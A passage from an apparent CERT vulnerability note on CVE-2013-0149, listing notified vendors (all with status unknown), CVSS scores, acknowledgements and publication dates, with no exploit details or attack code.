                                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                Status

                                                                                  Unknown

                                                                                Vendor Statement

                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                Vendor References

                                                                                  Nortel Networks, Inc.

                                                                                  Notified:  May 10, 2013 Updated:  May 10, 2013

                                                                                  Status

                                                                                    Unknown

                                                                                  Vendor Statement

                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                  Vendor References

                                                                                    Novell, Inc.

                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                    Status

                                                                                      Unknown

                                                                                    Vendor Statement

                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                    Vendor References

                                                                                      OpenBSD

                                                                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                      Status

                                                                                        Unknown

                                                                                      Vendor Statement

                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                      Vendor References

                                                                                        Openwall GNU/*/Linux

                                                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                        Status

                                                                                          Unknown

                                                                                        Vendor Statement

                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                        Vendor References

                                                                                          Peplink

                                                                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                          Status

                                                                                            Unknown

                                                                                          Vendor Statement

                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                          Vendor References

                                                                                            Process Software

                                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                            Status

                                                                                              Unknown

                                                                                            Vendor Statement

                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                            Vendor References

                                                                                              Q1 Labs

                                                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                              Status

                                                                                                Unknown

                                                                                              Vendor Statement

                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                              Vendor References

                                                                                                QLogic

                                                                                                Notified:  July 17, 2013 Updated:  July 17, 2013

                                                                                                Status

                                                                                                  Unknown

                                                                                                Vendor Statement

                                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                                Vendor References

                                                                                                  QNX Software Systems Inc.

                                                                                                  Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                  Status

                                                                                                    Unknown

                                                                                                  Vendor Statement

                                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                                  Vendor References

                                                                                                    Red Hat, Inc.

                                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                    Status

                                                                                                      Unknown

                                                                                                    Vendor Statement

                                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                                    Vendor References

                                                                                                      SUSE Linux

                                                                                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                      Status

                                                                                                        Unknown

                                                                                                      Vendor Statement

                                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                                      Vendor References

                                                                                                        SafeNet

                                                                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                        Status

                                                                                                          Unknown

                                                                                                        Vendor Statement

                                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                                        Vendor References

                                                                                                          Secureworx, Inc.

                                                                                                          Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                          Status

                                                                                                            Unknown

                                                                                                          Vendor Statement

                                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                                          Vendor References

                                                                                                            Silicon Graphics, Inc.

                                                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                            Status

                                                                                                              Unknown

                                                                                                            Vendor Statement

                                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                                            Vendor References

                                                                                                              Slackware Linux Inc.

                                                                                                              Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                              Status

                                                                                                                Unknown

                                                                                                              Vendor Statement

                                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                                              Vendor References

                                                                                                                SmoothWall

                                                                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                Status

                                                                                                                  Unknown

                                                                                                                Vendor Statement

                                                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                Vendor References

                                                                                                                  Snort

                                                                                                                  Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                  Status

                                                                                                                    Unknown

                                                                                                                  Vendor Statement

                                                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                  Vendor References

                                                                                                                    Sony Corporation

                                                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                    Status

                                                                                                                      Unknown

                                                                                                                    Vendor Statement

                                                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                    Vendor References

                                                                                                                      Sourcefire

                                                                                                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                      Status

                                                                                                                        Unknown

                                                                                                                      Vendor Statement

                                                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                      Vendor References

                                                                                                                        Stonesoft

                                                                                                                        Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                                        Status

                                                                                                                          Unknown

                                                                                                                        Vendor Statement

                                                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                        Vendor References

                                                                                                                          Symantec

                                                                                                                          Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                                          Status

                                                                                                                            Unknown

                                                                                                                          Vendor Statement

                                                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                          Vendor References

                                                                                                                            The SCO Group

                                                                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                            Status

                                                                                                                              Unknown

                                                                                                                            Vendor Statement

                                                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                            Vendor References

                                                                                                                              TippingPoint Technologies Inc.

                                                                                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                              Status

                                                                                                                                Unknown

                                                                                                                              Vendor Statement

                                                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                              Vendor References

                                                                                                                                Turbolinux

                                                                                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                                Status

                                                                                                                                  Unknown

                                                                                                                                Vendor Statement

                                                                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                Vendor References

                                                                                                                                  Ubuntu

                                                                                                                                  Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                                  Status

                                                                                                                                    Unknown

                                                                                                                                  Vendor Statement

                                                                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                  Vendor References

                                                                                                                                    Unisys

                                                                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                                    Status

                                                                                                                                      Unknown

                                                                                                                                    Vendor Statement

                                                                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                    Vendor References

                                                                                                                                      Wind River Systems, Inc.

                                                                                                                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                                      Status

                                                                                                                                        Unknown

                                                                                                                                      Vendor Statement

                                                                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                      Vendor References

                                                                                                                                        Windstream

                                                                                                                                        Notified:  July 29, 2013 Updated:  July 29, 2013

                                                                                                                                        Status

                                                                                                                                          Unknown

                                                                                                                                        Vendor Statement

                                                                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                        Vendor References

                                                                                                                                          ZyXEL

                                                                                                                                          Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                                                          Status

                                                                                                                                            Unknown

                                                                                                                                          Vendor Statement

                                                                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                          Vendor References

                                                                                                                                            m0n0wall

                                                                                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                                            Status

                                                                                                                                              Unknown

                                                                                                                                            Vendor Statement

                                                                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                            Vendor References

                                                                                                                                              netfilter

                                                                                                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                                              Status

                                                                                                                                                Unknown

                                                                                                                                              Vendor Statement

                                                                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                                              Vendor References

                                                                                                                                                View all 97 vendors View less vendors


                                                                                                                                                CVSS Metrics

                                                                                                                                                Group Score Vector
                                                                                                                                                Base 5.4 AV:A/AC:M/Au:N/C:P/I:P/A:P
                                                                                                                                                Temporal 4.2 E:POC/RL:OF/RC:C
                                                                                                                                                Environmental 5.1 CDP:MH/TD:M/CR:ND/IR:ND/AR:H

                                                                                                                                                References

                                                                                                                                                Acknowledgements

                                                                                                                                                Thanks to Dr. Gabi Nakibly for reporting this vulnerability.

                                                                                                                                                This document was written by Chris King.

                                                                                                                                                Other Information

                                                                                                                                                CVE IDs: CVE-2013-0149
                                                                                                                                                Date Public: 2013-08-01
                                                                                                                                                Date First Published: 2013-08-02
                                                                                                                                                Date Last Updated: 2013-12-06 18:59 UTC
                                                                                                                                                Document Revision: 58

                                                                                                                                                Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.